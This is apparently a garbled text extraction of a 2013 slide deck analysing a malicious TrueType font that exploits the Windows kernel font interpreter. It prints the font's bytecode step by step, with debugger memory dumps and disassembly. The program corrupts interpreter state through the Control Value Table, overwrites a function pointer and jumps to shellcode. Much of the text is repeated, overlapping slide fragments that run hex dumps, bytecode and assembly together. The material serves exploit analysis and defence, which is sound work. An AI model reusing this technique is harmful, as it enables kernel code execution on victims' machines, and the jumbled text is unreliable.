The setting of the auto_flip Boolean determines whether the sign of values in the Control Value Table is significant. [...] Friday, March 8, 2013 CVT e2481f80 00000000 CVT+4 = Global State kd> dd e2481f84 L100 e2481f84 e2481afc e2481f00 e2481f80 00030004 [CVT+4] = Stack e2481f94 00040000 00000000 00000000 00000000 e2481fa4 00000000 00000044 00000000 00000000 e2481fb4 00000000CVT+[0x2C*4]: 00000000 00000040 bf85c269 e2481fc4 00000003 00000000 00000000 00000000 Font Data = e2481fd4 00030009[CVT+[0x2C*4]] 00000080 00000001 =00000044 e2481fe4 00000000 00000000 00000000 00000000 e2481ff4 00000040 bf85c269 00000003 00000000 e2482004 00000000 00000000 00030009 00010080 e2482014 00000001 e2481f80 e2481f80 00000000 e2482024 00000000 bf85bd4b bf85bd4b e2482368 e2482034 e24bdbb3 0000000d e2482318 0003b89b e2482044 00000000 00000000 00000000 00000000 e2482054 00000000 00000000 00000000 00000000 e2482064 00002000 00000400 00000080 0000000a e2482074 00002000 00000400 00000080 0000000a e2482084 00002000 00000400 00000080 0000000a e2482094 00010000 00010000 00000001 00000000 e24820a4 00000000 00000200 00000000 00000001 e24820b4 e2481290 00000081 00040000 00040000 e24820c4 00040000 00040000 00000000 00000001 e24820d4 00002710 00000064 00989680 e1c5d4b0 Friday, March 8, 2013 Base Shellcode CVT e2481f80 00000000 CVT+4 = Global State kd> dd e2481f84 L100 e2481f84 e2481afc e2481f00 e2481f80 00030004 [CVT+4] = Stack Base e2481f94 00040000 00000000 00000000 00000000 e2481fa4 00000000 00000044 00000000 00000000 e2481fb4 00000000CVT+[0x2C*4]: 00000000 00000040 bf85c269 e2481fc4 00000003 00000000 00000000 00000000 Font Data = Shellcode e2481fd4 00030009[CVT+[0x2C*4]] 00000080 00000001 =00000044 e2481fe4 00000000 00000000 00000000 00000000 e2481ff4 00000040 bf85c269 00000003 00000000 e2482004 00000000 00000000 00030009 00010080 e2482014 00000001 e2481f80 e2481f80 00000000 e2482024 00000000 bf85bd4b bf85bd4b e2482368 e2482034 e24bdbb3 0000000d e2482318 0003b89b e2482044 00000000 00000000 
00000000 00000000 kd> 00000000 dd e2482368 e2482054 00000000 00000000 00000000 e2482368 fffffbe8 000000ff 00000000 00000000 e2482064 00002000 00000400 00000080 0000000a e2482378 00000000 00000000 00000000 00000000 e2482074 00002000 00000400 00000080 0000000a e2482388 00000000 00000000 00000000 00000000 e2482084 00002000 00000400 00000080 0000000a e2482094 00010000 00010000 00000001 00000000 e24820a4 00000000 00000200 00000000 00000001 e24820b4 e2481290 00000081 00040000 00040000 e24820c4 00040000 00040000 00000000 00000001 e24820d4 00002710 00000064 00989680 e1c5d4b0 Friday, March 8, 2013 CVT e2481f80 00000000 CVT+4 = Global State kd> dd e2481f84 L100 e2481f84 e2481afc e2481f00 e2481f80 00030004 [CVT+4] = Stack Base e2481f94 00040000 00000000 00000000 00000000 e2481fa4 00000000 00000044 00000000 00000000 e2481fb4 00000000CVT+[0x2C*4]: 00000000 00000040 bf85c269 e2481fc4 00000003 00000000 00000000 00000000 Font Data = Shellcode e2481fd4 00030009[CVT+[0x2C*4]] 00000080 00000001 =00000044 e2481fe4 00000000 00000000 00000000 00000000 e2481ff4 00000040 bf85c269 00000003 00000000 e2482004 00000000 00000000 00030009 00010080 e2482014 00000001 e2481f80 e2481f80 00000000 e2482024 00000000 bf85bd4b bf85bd4b e2482368 e2482034 e24bdbb3 0000000d e2482318 0003b89b e2482044 00000000 00000000 00000000 00000000 kd> 00000000 dd e2482368 e2482054 00000000 00000000 00000000 e2482368 fffffbe8 000000ff 00000000 00000000 e2482064 00002000 00000400 00000080 0000000a e2482378 00000000 00000000 00000000 00000000 e2482074 00002000 00000400 00000080 0000000a e2482388 00000000 00000000 00000000 00000000 e2482084 00002000 00000400 00000080 0000000a e2482094 00010000 00010000 00000001 00000000 e24820a4 00000000 00000200 00000000 00000001 e24820b4 e2481290 00000081 00040000 00040000 e24820c4 00040000 00040000 00000000 00000001 e24820d4 00002710 00000064 00989680 e1c5d4b0 00000000 Friday, March 8, 2013 E8FBFFFFFF call 0x0 CVT e2481f80 00000000 CVT+4 = Global State kd> dd e2481f84 L100 e2481f84 
e2481afc e2481f00 e2481f80 00030004 [CVT+4] = Stack Base e2481f94 00040000 00000000 00000000 00000000 e2481fa4 00000000 00000044 00000000 00000000 e2481fb4 00000000CVT+[0x2C*4]: 00000000 00000040 bf85c269 e2481fc4 00000003 00000000 00000000 00000000 Font Data = Shellcode e2481fd4 00030009[CVT+[0x2C*4]] 00000080 00000001 =00000044 e2481fe4 00000000 00000000 00000000 00000000 e2481ff4 00000040 bf85c269 00000003 00000000 e2482004 00000000 00000000 00030009 00010080 e2482014 00000001 e2481f80 e2481f80 00000000 e2482024 00000000 bf85bd4b bf85bd4b e2482368 e2482034 e24bdbb3 0000000d e2482318 0003b89b e2482044 00000000 00000000 00000000 00000000 e2482054 00000000 00000000 00000000 00000000 e2482314 00000000 b8c07fb8 b863c001 b860403a e2482064 00002000 00000400 00000080 0000000a e2482324 1c600c00 00000000 00000000 00000000 e2482074 00002000 00000400 00000080 0000000a e2482084 00002000 00000400 00000080 0000000a e2482094 00010000 00010000 00000001 00000000 e24820a4 00000000 00000200 00000000 00000001 e24820b4 e2481290 00000081 00040000 00040000 e24820c4 00040000 00040000 00000000 00000001 e24820d4 00002710 00000064 00989680 e1c5d4b0 Friday, March 8, 2013 MIRP single_width_value 0 pixels SSW MIAP MIRP Opcode 0x1F = SSW = itrp_LSW(x,x) Page 360 Friday, March 8, 2013 Revision 1.66 File Name: grstate.doc ; __fastcall itrp_LSW(x, x) @itrp_LSW@8 proc near mov push mov push push ; CODE XREF: itrp_InnerExecute(x,x)+2B^Xp ; itrp_InnerTraceExecute(x,x)+56^Xp ; DATA XREF: ... 
eax, dword_BF9A9234 ebx ebx, [eax] esi edi mov dword_BF9A927C, 1110h pop ebx retn ; --------------------------------------------------------------------------loc_BF98B9F9: @itrp_LSW@8 Friday, March 8, 2013 ; CODE XREF: itrp_LSW(x,x)+28^Xj sub mov mov movsx mov lea call mov mov pop pop pop retn endp ecx, 4 dword_BF9A9228, ecx ecx, [ecx] edx, cx [esi+32h], cx ecx, [eax+100h] dword ptr [eax+0ACh] [esi+8], eax eax, edi edi esi ebx ; __fastcall itrp_LSW(x, x) @itrp_LSW@8 proc near mov push mov push push ; CODE XREF: itrp_InnerExecute(x,x)+2B^Xp ; itrp_InnerTraceExecute(x,x)+56^Xp ; DATA XREF: ... eax, dword_BF9A9234 ebx ebx, [eax] esi edi e2481f80 00000000 mov dword_BF9A927C, 1110h kd> L100 popdd e2481f84 ebx retn e2481f84 e2481afc e2481f00 e2481f80 00030004 ; --------------------------------------------------------------------------e2481f94 00040000 00000000 00000000 00000000 loc_BF98B9F9: ... ; CODE XREF: itrp_LSW(x,x)+28^Xj e2482024 00000000 bf85bd4b bf85bd4b e2482368 sub ecx, 4 e2482034 mov dword_BF9A9228, e24bdbb3 0000000d ecx e2482318 0003b89b @itrp_LSW@8 Friday, March 8, 2013 mov movsx mov lea call mov mov pop pop pop retn endp ecx, [ecx] edx, cx [esi+32h], cx ecx, [eax+100h] dword ptr [eax+0ACh] [esi+8], eax eax, edi edi esi ebx [CVT+0xAC] = “SSW” ; __fastcall itrp_LSW(x, x) @itrp_LSW@8 proc near ; CODE XREF: itrp_InnerExecute(x,x)+2B^Xp ; itrp_InnerTraceExecute(x,x)+56^Xp ; DATA XREF: ... kd> dd e2482368 eax, dword_BF9A9234 e2482368 mov fffffbe8 000000ff 00000000 00000000 push ebx e2482378 mov 00000000 00000000 00000000 ebx, 00000000 [eax] e2482388 push 00000000 esi 00000000 00000000 00000000 push edi e2481f80 00000000 mov dword_BF9A927C, 1110h kd> L100 popdd e2481f84 ebx retn e2481f84 e2481afc e2481f00 e2481f80 00030004 ; --------------------------------------------------------------------------e2481f94 00040000 00000000 00000000 00000000 loc_BF98B9F9: ... 
; CODE XREF: itrp_LSW(x,x)+28^Xj e2482024 00000000 bf85bd4b bf85bd4b e2482368 sub ecx, 4 e2482034 mov dword_BF9A9228, e24bdbb3 0000000d ecx e2482318 0003b89b @itrp_LSW@8 Friday, March 8, 2013 mov movsx mov lea call mov mov pop pop pop retn endp ecx, [ecx] edx, cx [esi+32h], cx ecx, [eax+100h] dword ptr [eax+0ACh] [esi+8], eax eax, edi edi esi ebx [CVT+0xAC] = “SSW” ; __fastcall itrp_LSW(x, x) @itrp_LSW@8 proc near ; CODE XREF: itrp_InnerExecute(x,x)+2B^Xp ; itrp_InnerTraceExecute(x,x)+56^Xp ; DATA XREF: ... kd> dd e2482368 eax, dword_BF9A9234 e2482368 mov fffffbe8 000000ff 00000000 00000000 push ebx e2482378 mov 00000000 00000000 00000000 ebx, 00000000 [eax] e2482388 push 00000000 esi 00000000 00000000 00000000 push edi e2481f80 00000000 mov dword_BF9A927C, 1110h kd> L100 popdd e2481f84 ebx retn e2481f84 e2481afc e2481f00 e2481f80 00030004 ; --------------------------------------------------------------------------e2481f94 00040000 00000000 00000000 00000000 loc_BF98B9F9: ... ; CODE XREF: itrp_LSW(x,x)+28^Xj e2482024 00000000 bf85bd4b bf85bd4b e2482368 sub ecx, 4 e2482034 mov dword_BF9A9228, e24bdbb3 0000000d ecx e2482318 0003b89b mov movsx mov lea call mov mov pop pop pop retn endp 00000000 @itrp_LSW@8 Friday, March 8, 2013 ecx, [ecx] edx, cx [esi+32h], cx ecx, [eax+100h] dword ptr [eax+0ACh] [esi+8], eax eax, edi edi esi ebx [CVT+0xAC] = “SSW” E8FBFFFFFF call 0x0 Font Program Walkthrough Friday, March 8, 2013 00000: PUSHB[1] 00002: PUSHB[1] 00004: WS 0 0 Push One Byte→0 Push One Byte→0x00000000 Friday, March 8, 2013 00000: PUSHB[1] 00002: PUSHB[1] 00004: WS 0 0 Push One Byte→0x00000000 Push One Byte→0x00000000 Friday, March 8, 2013 00000: PUSHB[1] 00002: PUSHB[1] 00004: WS 0 0 WS Value←0x00000000 WS Location←0x00000000 Friday, March 8, 2013 00000: PUSHB[1] 00002: PUSHB[1] 00004: WS 0 0 Storage Table: 0 1 2 3 4 5 6 7 8 9 10111213141516171819202122232 0 WS Value←0x00000000 WS Location←0x00000000 Friday, March 8, 2013 00000: PUSHB[1] 00002: PUSHB[1] 00004: WS 0 0 
Storage Table: 0 1 2 3 4 5 6 7 8 9 0 'maxp' Table - Maximum Profile -----------------------------Size = 32 bytes (expecting 32 bytes) 'maxp' version: 1.0 numGlyphs: 6 maxPoints: 2 maxContours: 1 maxCompositePoints: 0 maxCompositeContours: 0 10111213141516171819202122232 maxZones: 1 maxTwilightPoints: 0 maxStorage: 32 maxFunctionDefs: 0 maxInstructionDefs: 0 maxStackElements: 256 maxSizeOfInstructions: 0 maxComponentElements: 0 maxComponentDepth: 0 WS Value←0x00000000 WS Location←0x00000000 Friday, March 8, 2013 00000: PUSHB[1] 00002: PUSHB[1] 00004: WS 00005: 00006: 00008: 00009: 00010: 00011: 00013: 00014: 00015: 00016: 00018: 00019: Friday, March 8, 2013 0 0 FLIPOFF PUSHB[1] 0 RS RCVT FLIPON PUSHB[1] 0 RS RCVT SUB PUSHB[1] 23 SWAP JROT ; (19+23=42) 00000: PUSHB[1] 00002: PUSHB[1] 00004: WS 0 0 00005: FLIPOFF 00006: PUSHB[1] 0 00008: RS ; __fastcall itrp_FLIPOFF(x, 00009: RCVT @itrp_FLIPOFF@8 proc near 00010: FLIPON 00011: PUSHB[1] 0 mov eax, 00013: RS mov ecx, 00014: RCVT mov byte 00015: SUB 00016: PUSHB[1] 23 retn @itrp_FLIPOFF@8 endp 00018: SWAP 00019: JROT ; (19+23=42) Friday, March 8, 2013 x) ecx dword_BF9A9234 ptr [ecx+90h], 0 00000: PUSHB[1] 00002: PUSHB[1] 00004: WS 0 0 00005: FLIPOFF 00006: PUSHB[1] 0 00008: RS 00009: RCVT 00010: FLIPON 00011: PUSHB[1] 0 00013: RS ; __fastcall itrp_FLIPON(x, x) 00014: RCVT @itrp_FLIPON@8 proc near 00015: SUB 00016: PUSHB[1] 23 mov eax, ecx 00018: SWAP mov ecx, dword_BF9A9234 00019: JROT ; (19+23=42) mov byte ptr [ecx+90h], 1 retn @itrp_FLIPON@8 endp Friday, March 8, 2013 = CVT[1] = Global State e2481f80 ecx 00000000 00000: PUSHB[1] 0 kd> dd e2481f84 L100 00002: PUSHB[1] 0 e2481f84 e2481afc e2481f00 e2481f80 000300 e2481f94 00040000 00000000 00000000 000000 00004: WS e2481fa4 00000000 00000044 00000000 000000 e2481fb4 00000000 00000000 00000040 bf85c2 00005: FLIPOFF 00006: PUSHB[1] 0 e2481fc4 00000003 00000000 00000000 000000 e2481fd4 00030009 00000080 00000001 000000 00008: RS e2481fe4 00000000 00000000 00000000 000000 
00009: RCVT e2481ff4 00000040 bf85c269 00000003 000000 e2482004 00000000 00000000 00030009 000100 00010: FLIPON e2482014 00000001 e2481f80 e2481f80 000000 +0x90: auto_flip 00011: PUSHB[1] 0 e2482024 00000000 bf85bd4b bf85bd4b e24823 00013: RS e2482034 e24bdbb3 ; __fastcall itrp_FLIPON(x, x)0000000d e2482318 0003b8 e2482044 00000000 00000000 00000000 000000 00014: RCVT @itrp_FLIPON@8 e2482054 proc near 00000000 00000000 00000000 000000 00015: SUB e2482064 00002000 00000400 00000080 000000 00016: PUSHB[1] 23 e2482074 00002000 00000400 00000080 000000 mov eax, ecx e2482084 00002000 00000400 00000080 000000 00018: SWAP mov ecx, dword_BF9A9234 e2482094 00010000 00010000 00000001 000000 00019: JROT ; (19+23=42) mov byte ptr [ecx+90h], 1 e24820a4 00000000 00000200 00000000 000000 e24820b4 e2481290 00000081 00040000 000400 retn e24820c4 00040000 00040000 00000000 000000 @itrp_FLIPON@8 endp e24820d4 00002710 00000064 00989680 e1c5d4 Friday, March 8, 2013 00000: PUSHB[1] 00002: PUSHB[1] 00004: WS 00005: 00006: 00008: 00009: 00010: 00011: 00013: 00014: 00015: 00016: 00018: 00019: 0 0 FLIPOFF PUSHB[1] 0 RS RCVT FLIPON PUSHB[1] 0 RS RCVT SUB PUSHB[1] 23 SWAP JROT ; (19+23=42) Push One Byte→0 Push One Byte→0x00000000 Friday, March 8, 2013 00000: PUSHB[1] 00002: PUSHB[1] 00004: WS 00005: 00006: 00008: 00009: 00010: 00011: 00013: 00014: 00015: 00016: 00018: 00019: 0 0 FLIPOFF PUSHB[1] 0 RS RCVT FLIPON PUSHB[1] 0 RS RCVT SUB PUSHB[1] 23 SWAP JROT ; (19+23=42) Push One Byte→0 RS Location←0x00000000 Friday, March 8, 2013 00000: PUSHB[1] 00002: PUSHB[1] 00004: WS 00005: 00006: 00008: 00009: 00010: 00011: 00013: 00014: 00015: 00016: 00018: 00019: 0 0 FLIPOFF PUSHB[1] 0 RS RCVT FLIPON PUSHB[1] 0 RS RCVT SUB PUSHB[1] 23 SWAP JROT ; (19+23=42) RS Location Storage Table: 0 1 2 3 4 5 6 7 8 9 101 0 Push One Byte→0 RS Value→0x00000000 Friday, March 8, 2013 00000: PUSHB[1] 00002: PUSHB[1] 00004: WS 00005: 00006: 00008: 00009: 00010: 00011: 00013: 00014: 00015: 00016: 00018: 00019: 0 0 FLIPOFF 
PUSHB[1] 0 RS RCVT FLIPON PUSHB[1] 0 RS RCVT SUB PUSHB[1] 23 SWAP JROT ; (19+23=42) Push One Byte→0 CVT Entry Number←0x00000000 Friday, March 8, 2013 00000: PUSHB[1] 00002: PUSHB[1] 00004: WS 00005: 00006: 00008: 00009: 00010: 00011: 00013: 00014: 00015: 00016: 00018: 00019: 0 0 FLIPOFF PUSHB[1] 0 RS RCVT FLIPON PUSHB[1] 0 RS RCVT SUB PUSHB[1] 23 SWAP JROT ; (19+23=42) 'cvt ' Table - Control Value Table ---------------------------------Size = 2 bytes, 1 entries Values -----0: 0 Remember, Original CVT: 0 0 Push One Byte→0 CVT Entry Number←0x00000000 Friday, March 8, 2013 00000: PUSHB[1] 00002: PUSHB[1] 00004: WS 0 0 CVT now has 129 entries 00005: FLIPOFF 00006: PUSHB[1] 0 00008: RS 000009: 1 2 3RCVT 4 5 6 7 8 9 10111213141516171819202122232 00010: FLIPON 0 00011: PUSHB[1] 0 00013: RS 00014: RCVT 00015: SUB 00016: PUSHB[1] 23 00018: SWAP 00019: JROT ; (19+23=42) Push One Byte→0 CVT Entry Number←0x00000000 Friday, March 8, 2013 00000: PUSHB[1] 00002: PUSHB[1] 00004: WS 0 0 CVT now has 129 entries 00005: FLIPOFF 00006: PUSHB[1] 0 00008: RS 000009: 1 2 3RCVT 4 5 6 7 8 9 10111213141516171819202122232 00010: FLIPON 0 00011: PUSHB[1] 0 00013: RS e2481f80 00000000 CVT[0] 00014: RCVT kd> dd e2481f84 L100 e2481f84 e2481afc e2481f00 e2481f80 00030004 00015: SUB e2481f94 00040000 00000000 00000000 00000000 00016: PUSHB[1] e2481fa4 23 00000000 00000044 00000000 00000000 00018: SWAP e2481fb4 00000000 00000000 00000040 bf85c269 CVT[1]00000000 = Global State e2481fc4 00000003 00000000 00000000 00019: JROT ; (19+23=42) Friday, March 8, 2013 e2481fd4 e2481fe4 e2481ff4 e2482004 e2482014 e2482024 00030009 00000000 00000040 00000000 00000001 00000000 00000080 00000000 bf85c269 00000000 e2481f80 bf85bd4b 00000001 00000000 00000003 00030009 e2481f80 bf85bd4b 00000044 00000000 00000000 00010080 00000000 e2482368 00000: PUSHB[1] 00002: PUSHB[1] 00004: WS 00005: 00006: 00008: 00009: 00010: 00011: 00013: 00014: 00015: 00016: 00018: 00019: 0 0 FLIPOFF PUSHB[1] 0 RS RCVT FLIPON PUSHB[1] 0 RS 
RCVT SUB PUSHB[1] 23 SWAP JROT ; (19+23=42) Push One Byte→0 CVT Value→0x00000000 Friday, March 8, 2013 = CVT[1] = Global State e2481f80 ecx 00000000 00000: PUSHB[1] 0 kd> dd e2481f84 L100 00002: PUSHB[1] 0 e2481f84 e2481afc e2481f00 e2481f80 000300 e2481f94 00040000 00000000 00000000 000000 00004: WS e2481fa4 00000000 00000044 00000000 000000 e2481fb4 00000000 00000000 00000040 bf85c2 00005: FLIPOFF 00006: PUSHB[1] 0 e2481fc4 00000003 00000000 00000000 000000 e2481fd4 00030009 00000080 00000001 000000 00008: RS e2481fe4 00000000 00000000 00000000 000000 00009: RCVT e2481ff4 00000040 bf85c269 00000003 000000 e2482004 00000000 00000000 00030009 000100 00010: FLIPON e2482014 00000001 e2481f80 e2481f80 000000 +0x90: auto_flip 00011: PUSHB[1] 0 e2482024 00000000 bf85bd4b bf85bd4b e24823 00013: RS e2482034 e24bdbb3 ; __fastcall itrp_FLIPON(x, x)0000000d e2482318 0003b8 e2482044 00000000 00000000 00000000 000000 00014: RCVT @itrp_FLIPON@8 e2482054 proc near 00000000 00000000 00000000 000000 00015: SUB e2482064 00002000 00000400 00000080 000000 00016: PUSHB[1] 23 e2482074 00002000 00000400 00000080 000000 mov eax, ecx e2482084 00002000 00000400 00000080 000000 00018: SWAP mov ecx, dword_BF9A9234 e2482094 00010000 00010000 00000001 000000 00019: JROT ; (19+23=42) mov byte ptr [ecx+90h], 1 e24820a4 00000000 00000200 00000000 000000 e24820b4 e2481290 00000081 00040000 000400 retn e24820c4 00040000 00040000 00000000 000000 @itrp_FLIPON@8 endp e24820d4 00002710 00000064 00989680 e1c5d4 Friday, March 8, 2013 00000: PUSHB[1] 00002: PUSHB[1] 00004: WS 00005: 00006: 00008: 00009: 00010: 00011: 00013: 00014: 00015: 00016: 00018: 00019: 0 0 FLIPOFF PUSHB[1] 0 RS RCVT FLIPON PUSHB[1] 0 RS RCVT SUB PUSHB[1] 23 SWAP JROT ; (19+23=42) Push One Byte→0x00000000 CVT Value→0x00000000 Friday, March 8, 2013 00000: PUSHB[1] 00002: PUSHB[1] 00004: WS 00005: 00006: 00008: 00009: 00010: 00011: 00013: 00014: 00015: 00016: 00018: 00019: 0 0 FLIPOFF PUSHB[1] 0 RS RCVT FLIPON PUSHB[1] 0 RS RCVT SUB 
Glyph program, bytes 0-19: the auto_flip probe

    00000: PUSHB[1] 0
    00002: PUSHB[1] 0
    00004: WS
    00005: FLIPOFF
    00006: PUSHB[1] 0
    00008: RS
    00009: RCVT
    00010: FLIPON
    00011: PUSHB[1] 0
    00013: RS
    00014: RCVT
    00015: SUB
    00016: PUSHB[1] 23
    00018: SWAP
    00019: JROT ; (19+23=42)

Stack trace, one step per slide in the original deck:

    RS:           Location←0x00000000, Value→0x00000000
    RCVT:         CVT Entry Number←0x00000000, CVT Value→0x00000000
    (the second RS/RCVT pair reads the same entry with auto_flip on)
    SUB:          Second Operand←0x00000000, First Operand←0x00000000,
                  (First-Second)→0x00000000, i.e. (Old CVT-New CVT)→0x00000000
    PUSHB[1] 23:  Push One Byte→0x00000017
    SWAP:         (Old CVT-New CVT)↔0x00000000, Push One Byte↔0x00000017
    JROT:         If This Is True←0x00000000, Then Jump Relative Offset←0x00000017
                  Not True, So Falls Through

Bytes 20-38: the loop counter

    00020: PUSHB[1] 0
    00022: RS
    00023: PUSHB[1] 1
    00025: ADD
    00026: DUP
    00027: PUSHB[1] 0
    00029: SWAP
    00030: WS
    00031: PUSHB[1] 80 ; 0x50
    00033: SUB
    00034: PUSHW[1] -33
    00037: SWAP
    00038: JROT ;(38-33=5)

    PUSHB[1] 0:   Push One Byte→0x00000000
    RS:           Location←0x00000000, Value→0x00000000
    PUSHB[1] 1:   Push One Byte→0x00000001
    ADD:          Second Operand←0x00000001, First Operand←0x00000000, (First+Second)→0x00000001
    DUP:          Duplicate→0x00000001
    PUSHB[1] 0:   Push Byte→0x00000000
    SWAP:         Duplicate↔0x00000001, Push Byte↔0x00000000
    WS:           Value←0x00000001, Location←0x00000000 (Loop Counter→0x00000001)
    PUSHB[1] 80:  Push Byte→0x00000050
    SUB:          Second Operand←0x00000050, First Operand←0x00000001, (0x01-0x50)(-79)→0xffffffb1
    PUSHW[1] -33: Push 16-bit Word→0xffffffdf
    SWAP:         (0x01-0x50)(-79)↔0xffffffb1, Push 16-bit Word↔0xffffffdf
    JROT:         If This Is True←0xffffffb1, Then Jump Relative Offset←0xffffffdf

Remember, CVT is now 0x80 longer (not 80.0; I'm not sure if this is a bug). So, only scan 80*4=320 bytes.

The interpreter's JROT handler, as shown beside the trace:

    ; __fastcall itrp_JROT(x, x)
    @itrp_JROT@8 proc near
        mov     edx, dword_BF9A9228
        push    esi
        mov     esi, dword_BF9A9234
        push    edi
        mov     edi, [esi]
        mov     eax, edx
        sub     eax, edi
        sar     eax, 2
        cmp     eax, 2
        pop     edi
        pop     esi
        jb      short loc_BF8D0428
        mov     eax, [edx-4]
        sub     edx, 4
        test    eax, eax
        mov     dword_BF9A9228, edx
        ;etc...

Bytes 39-41 (loop exhausted) and the tail of the program:

    00039: PUSHB[1] 128
    00041: JMPR ;(41+128=169)
    ...
    00162: PUSHB[1]
    00164: RS
    00165: PUSHB[1]
    00167: RS
    00168: WCVTP
    00169: (end; the glyf program is 169 bytes long)

GLYF Program

[Hexdump slide: table-directory rows 00000060-00000080 (fpgm, glyf, head entries) and the 169-byte glyf program at 0003bad0-0003bbc0; the byte columns are not recoverable from the extraction.]

CVT and Global State (kd)

    CVT = e2481f80 (CVT = Global State - 4; CVT+4 = Global State)
    kd> dd e2481f84 L100
    e2481f84 e2481afc e2481f00 e2481f80 00030004   ; [CVT+4] = Stack Base
    e2481f94 00040000 00000000 00000000 00000000
    e2481fa4 00000000 00000044 00000000 00000000
    e2481fb4 00000000 00000000 00000040 bf85c269
    e2481fc4 00000003 00000000 00000000 00000000
    e2481fd4 00030009 00000080 00000001 00000044
    e2481fe4 00000000 00000000 00000000 00000000
    e2481ff4 00000040 bf85c269 00000003 00000000
    e2482004 00000000 00000000 00030009 00010080
    e2482014 00000001 e2481f80 e2481f80 00000000   ; +0x90: auto_flip
    e2482024 00000000 bf85bd4b bf85bd4b e2482368   ; offset +0x2C
    e2482034 e24bdbb3 0000000d e2482318 0003b89b
    e2482044 00000000 00000000 00000000 00000000
    e2482054 00000000 00000000 00000000 00000000
    e2482064 00002000 00000400 00000080 0000000a
    e2482074 00002000 00000400 00000080 0000000a
    e2482084 00002000 00000400 00000080 0000000a
    e2482094 00010000 00010000 00000001 00000000
    e24820a4 00000000 00000200 00000000 00000001
    e24820b4 e2481290 00000081 00040000 00040000
    e24820c4 00040000 00040000 00000000 00000001
    e24820d4 00002710 00000064 00989680 e1c5d4b0

    CVT+[4*0x25] = [CVT+0x94] = [Global State +0x90] = auto_flip

The JROT at 19 is true when the RCVT loop reaches 0x25.

Bytes 42-67: saving the neighbouring entries

    00042: PUSHB[1] 0
    00044: RS
    00045: DUP
    00046: PUSHB[1] 1
    00048: SUB
    00049: DUP
    00050: PUSHB[1] 1
    00052: SUB
    00053: RCVT
    00054: PUSHB[1] 1
    00056: SWAP
    00057: WS           ; Stores DWORD from +0x26
    00058: RCVT
    00059: PUSHB[1] 2
    00061: SWAP
    00062: WS           ; Storage element 2
    00063: RCVT
    00064: PUSHB[1] 3
    00066: SWAP
    00067: WS           ; Storage element 3

Bytes 68-101: sanity checks

    00068: PUSHB[1] 1
    00070: RS           ; e2481f80
    00071: PUSHB[1] 0
    00073: LT           ; 1
    00074: NOT
    00075: PUSHB[1] 24
    00077: SWAP
    00078: JROT ;(78+24=102)      Another Sanity Check
    00079: PUSHB[1] 1
    00081: RS
    00082: PUSHB[1] 2
    00084: RS
    00085: SUB
    00086: PUSHB[1] 13
    00088: SWAP
    00089: JROT ;(89+13=102)      Ditto
    00090: PUSHB[1] 1
    00092: RS
    00093: PUSHB[1] 3
    00095: RS
    00096: SUB
    00097: NOT
    00098: PUSHB[1] 43
    00100: SWAP
    00101: JROT ;(101+43=144)     Possibly a test for 64-bit

Bytes 102-120: advance the counter, or exit

    00102: PUSHB[1] 0
    00104: RS
    00105: PUSHB[1] 1
    00107: ADD
    00108: DUP
    00109: PUSHB[1] 0
    00111: SWAP
    00112: WS
    00113: PUSHB[1] 80
    00115: SUB
    00116: NOT
    00117: PUSHB[1] 49
    00119: SWAP
    00120: JROT ; 169 (exit)

Bytes 144-161: the write and the call

    00144: PUSHB[1] 0
    00146: RS           ; iteration 0x2c
    00147: PUSHB[1] 3   ; iteration + offset of 3
    00149: ADD          ; 0x2f
    00150: RCVT         ; e2482318 -> DataPGM [GlobalGS+0x2e*4]
    00151: PUSHB[1] 80  ; 0x50 shellcode offset
    00153: ADD          ; Total e2482368
    00154: PUSHB[1] 0   ; Stack: 0x00, e2482368
    00156: RS           ; Stack: 0x2c, e2482368
    00157: SWAP         ; Stack: e2482368, 0x2c
    00158: WCVTP        ; ControlValueTable+0x2c*4 = GlobalGS+0x2b*4 = GlobalGS+0xAC
    00159: PUSHB[1] 1
    00161: SSW          ; Call Shellcode (SSW pops an argument)

    [CVT+0xAC] = "SSW"
    [CVT] = [GlobalGS-4]
    [CVT+(4*2C)] = [CVT+0xB0] = [GlobalGS+0xB0-4] = [GlobalGS+0xAC] = SSW()

On-Disk Format

    Table directory (16 tables): EBDT, EBLC, EBSC, OS/2, cmap, cvt , fpgm, glyf, head, hhea, hmtx, loca, maxp, name, post, prep
    ...
    00000060  00 00 00 00 00 03 ba d0 00 00 00 02 66 70 67 6d  |............fpgm|
    00000070  7f 06 e9 00 00 00 01 0c 00 03 b8 9b 67 6c 79 66  |............glyf|
    00000080  18 d3 69 4b 00 03 ba e4 00 00 00 bc 68 65 61 64  |..iK........head|
    00000090  db b2 28 94 00 03 b9 a8 00 00 00 36 68 68 65 61  |..(........6hhea|
    000000a0  00 16 00 be 00 03 b9 e0 00 00 00 24 68 6d 74 78  |...........$hmtx|
    000000b0  00 82 00 1e 00 03 ba 7c 00 00 00 0e 6c 6f 63 61  |.......|....loca|
    ...
    Font Program Starts here (fpgm); at fpgm +0x50: E8FBFFFFFF = call 0x0
    [The remaining rows of the file header and fpgm dump are not recoverable from the extraction.]

    kd> dd e2482368
    e2482368 fffffbe8 000000ff 00000000 00000000
    e2482378 00000000 00000000 00000000 00000000
    e2482388 00000000 00000000 00000000 00000000

The SSW handler that makes the call:

    ; __fastcall itrp_LSW(x, x)
    @itrp_LSW@8 proc near           ; CODE XREF: itrp_InnerExecute(x,x)+2B
                                    ; itrp_InnerTraceExecute(x,x)+56
                                    ; DATA XREF: ...
        mov     eax, dword_BF9A9234
        push    ebx
        mov     ebx, [eax]
        push    esi
        push    edi
        mov     dword_BF9A927C, 1110h
        pop     ebx
        retn
    ; ---------------------------------------------------------------------------
    loc_BF98B9F9:                   ; CODE XREF: itrp_LSW(x,x)+28
        sub     ecx, 4
        mov     dword_BF9A9228, ecx
        mov     ecx, [ecx]
        movsx   edx, cx
        mov     [esi+32h], cx
        lea     ecx, [eax+100h]
        call    dword ptr [eax+0ACh] ; [EAX+0xAC] = "SSW()"
        mov     [esi+8], eax
        mov     eax, edi
        pop     edi
        pop     esi
        pop     ebx
        retn
    @itrp_LSW@8 endp

Finalé

    00157: SWAP         ; Stack: e2482368, 0x2c
    00158: WCVTP        ; ControlValueTable[0x2c]
    00159: PUSHB[1] 1
    00161: SSW          ; Call Shellcode

    ; __fastcall itrp_LSW(x, x)
    ;...
        lea     ecx, [eax+100h]
        call    dword ptr [eax+0ACh]
        mov     [esi+8], eax

    Debugging Details:
    ------------------
    BUGCHECK_STR: 0x7f_8
    TSS: 00000028 -- (.tss 0x28)
    eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e2481fe0 edi=01
    eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0 nv up ei ng nz ac
    cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00
    e2482368 e8fbffffff call e2482368
